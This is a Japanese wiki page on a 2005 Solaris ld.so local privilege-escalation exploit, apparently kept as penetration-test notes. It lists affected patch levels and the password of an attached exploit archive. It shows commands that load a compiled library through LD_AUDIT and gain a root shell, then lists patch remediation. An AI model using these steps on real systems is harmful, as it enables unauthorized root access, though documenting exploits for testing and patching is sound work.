[[exploit:local:unix:sol-ld]]
 
トレース: » 玄箱の初期化 » MS06-040:Server サービスの脆弱性により、リモートでコードが実行される » Pantera » AWStats 5.7 - 6.2 Multiple Remote Exploit » Apache 2.2.x インストール » qpopper <= 4.0.8 poppassd localroot exploit » MS04-011:Microsoft IIS 5.0 SSL Remote buffer overflow Exploit » ExploitTree v.2 » Cacti - デバイスの追加方法 » Solaris 9 / 10 ld.so Local Root Exploit
目次

Solaris 9 / 10 ld.so Local Root Exploit

更新履歴

  • 2006/02/16 初版

概要

  • Solaris9/10 の ld.so の脆弱性を利用した攻撃コード。
  • 一般ユーザから root になれる。
  • 2005/06/28 公開

影響を受けるシステム

  • SPARC Platform:
    • Solaris 8 with patches 109147-31 through 109147-36 and without patch 109147-37
    • Solaris 9 with patches 112963-16 through 112963-21 and without patch 112963-22
    • Solaris 10 without patch 117461-04
  • x86 Platform
    • Solaris 8 with patches 109148-31 through 109148-36 and without patch 109148-37
    • Solaris 9 with patches 113986-12 through 113986-17 and without patch 113986-18
    • Solaris 10 without patch 118345-05

影響を受けないシステム

  • Solaris 7

添付ファイル

files password
dupa.zip pen-test

参考URL

Exploitの検証

検証環境

  • SPARC版 Solaris8

検証結果

  • 一般ユーザでログイン後、以下コマンドを実行する。
$ vi dupa.c

 内容は、添付ファイルのソースコード

$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ setenv LD_AUDIT /tmp/dupa.so ※bashの場合は export LD_AUDIT=/tmp/dupa.so
$ ping
# 
# id
uid=0(root) gid=1000(localusr)
#

対処方法

  1. パッチの適用
    • SPARC Platform
      • Solaris 8 with patch 109147-37 or later
      • Solaris 9 with patch 112963-22 or later
      • Solaris 10 with patch 117461-04 or later
    • x86 Platform
      • Solaris 8 with patch 109148-37 or later
      • Solaris 9 with patch 113986-18 or later
      • Solaris 10 with patch 118345-05 or later
  2. ユーザの厳格な管理
    • 不要なユーザを作成しない
 
exploit/local/unix/sol-ld.txt · 最終更新: 2007/10/16 12:02
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki NINJA TOOLS